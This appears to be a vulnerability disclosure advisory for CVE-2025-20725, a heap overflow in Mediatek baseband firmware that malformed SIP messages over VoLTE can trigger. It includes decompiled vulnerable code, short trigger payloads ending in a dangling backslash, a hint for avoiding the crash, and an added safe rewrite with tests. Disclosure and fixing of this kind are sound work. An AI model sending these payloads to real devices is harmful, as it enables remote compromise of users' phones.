An attacker sending a malformed SIP message over VoLTE to a device with a Mediatek baseband can trigger the vulnerability described here.
The impact is a heap overflow in the baseband, triggered by a malformed VoLTE message such as a SIP INVITE or MESSAGE request.
The vulnerability described in this advisory affected a wide range of Mediatek devices. It is assigned CVE-2025-20725.
Vulnerability Details
#include <string.h>

/* Decompiled from the Mediatek baseband: in-place unquoting of a MIME
 * parameter value. Removes '"' characters and, for each backslash, copies
 * the byte that follows it. */
char *inet_msg_mime_quote(char *str) {
    char *slash_or_quote_ptr;
    char *src;
    char *dst;
    char curr;
    char *src_following;

    slash_or_quote_ptr = strpbrk(str, "\\\"");
    src_following = str;
    dst = str;
    if (slash_or_quote_ptr != NULL) {
        while (src = src_following, curr = *src, curr != '\0') {
            src_following = src + 1;
            if (curr != '\"') {
                if (curr != '\\') {
                    src_following = src;
                }
                /* for a backslash this copies the following byte, even when
                 * that byte is the terminating zero */
                *dst = *src_following;
                dst = dst + 1;
                /* after a backslash the read pointer has advanced by two */
                src_following = src_following + 1;
            }
        }
        *dst = '\0';
    }
    return str;
}
The pre-parser splits the message into lines by writing string-terminating zeros over the \r characters; the \n characters remain intact.
When a \ is seen, the read pointer is incremented by two at the end of the loop iteration, which effectively "escapes" the terminating zero: the copy loop steps over it and continues reading into the bytes that follow.
The crash (that is, the overwrite of the heap chunk footer or the following chunk header) is avoidable with proper " padding.
Example payload
a
Authentication-Info:qop=x\
1234567890
Variants:
a
Authentication-Info:nextnonce=\
a
Authentication-Info:rspauth=\
Note that a is the SIP request line.
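As an added example that is not part of this advisory and not Mediatek's code, the following C rewrite of the same in-place unquoting routine refuses to step over the terminator: a backslash is only consumed when a byte other than the terminating zero follows it, so the read and write pointers stay inside the original string. The function name mime_unquote_safe, the two helper functions and the sample buffer are constructed for illustration; the buffer mimics the pre-parser layout described above (a zero written over \r, the \n and the next header line left in place) and carries the dangling-backslash payload from the advisory on its first line.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Mediatek's code. Same in-place contract as
 * inet_msg_mime_quote: strip '"' characters and replace each backslash pair
 * with the escaped byte, writing back into str. The difference is that a
 * backslash is only consumed when a byte other than the terminator follows
 * it, so the loop can never read or write past the string's own zero. */
char *mime_unquote_safe(char *str) {
    char *src = str;
    char *dst = str;
    char c;

    /* Same fast path as the original: untouched when nothing needs unquoting. */
    if (strpbrk(str, "\\\"") == NULL)
        return str;

    while ((c = *src) != '\0') {
        if (c == '"') {
            src++;                    /* drop the quote, copy nothing */
        } else if (c == '\\') {
            if (src[1] == '\0')
                break;                /* dangling backslash: stop at the terminator */
            *dst++ = src[1];          /* copy the escaped byte */
            src += 2;
        } else {
            *dst++ = *src++;
        }
    }
    *dst = '\0';                      /* dst <= src, so this stays inside the string */
    return str;
}

/* Copies in into a scratch buffer, unquotes it and compares with expected.
 * Returns 1 on match, 0 otherwise (or when the input does not fit). */
int unquote_matches(const char *in, const char *expected) {
    char tmp[128];
    if (strlen(in) >= sizeof tmp)
        return 0;
    strcpy(tmp, in);
    return strcmp(mime_unquote_safe(tmp), expected) == 0;
}

/* Reproduces the layout the advisory describes: the pre-parser has written a
 * zero over the \r, and the \n plus the next header line still follow in the
 * same buffer. The first line is the dangling-backslash payload from the
 * advisory; the second line is constructed sample data. Returns 1 when
 * unquoting the first line leaves the next line untouched. */
int following_line_intact(void) {
    char buf[] = "Authentication-Info:qop=x\\" "\0" "\nContent-Length: 0";
    size_t first_len = strlen(buf);          /* length up to the inserted zero */
    char *second = buf + first_len + 1;      /* start of the next line (\n...) */

    mime_unquote_safe(buf);

    return strcmp(buf, "Authentication-Info:qop=x") == 0 &&
           strcmp(second, "\nContent-Length: 0") == 0;
}

int main(void) {
    printf("following line intact: %d\n", following_line_intact());
    printf("escape handling ok:    %d\n", unquote_matches("\"abc\\\"def\"", "abc\"def"));
    printf("dangling backslash ok: %d\n", unquote_matches("x\\", "x"));
    return 0;
}
```

The choice to drop a dangling backslash rather than keep it literally is a design decision of this example; either is acceptable as long as the parser stops at the terminator it was handed instead of trusting the byte after it.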
Affected Devices
Includes most, possibly all, of the following devices:
MT6739, MT6761, MT6762, MT6762D, MT6762M, MT6763, MT6765, MT6765T, MT6767, MT6768, MT6769, MT6769K, MT6769S, MT6769T, MT6769Z, MT6771, MT6779, MT6781, MT6783, MT6785, MT6785T, MT6785U, MT6789, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8666, MT8667, MT8673, MT8675, MT8676, MT8678, MT8765, MT8766, MT8766R, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8789, MT8791, MT8791T, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893
Timeline
- 2025.06.23. Bug reported to Mediatek PSIRT
- 2025.07.23. Mediatek confirms vulnerability
- 2025.07.23. Mediatek confirms CVE
- 2025.09.01. TASZK informs Mediatek of advisory disclosure plan
- 2025.10.01. Advisory release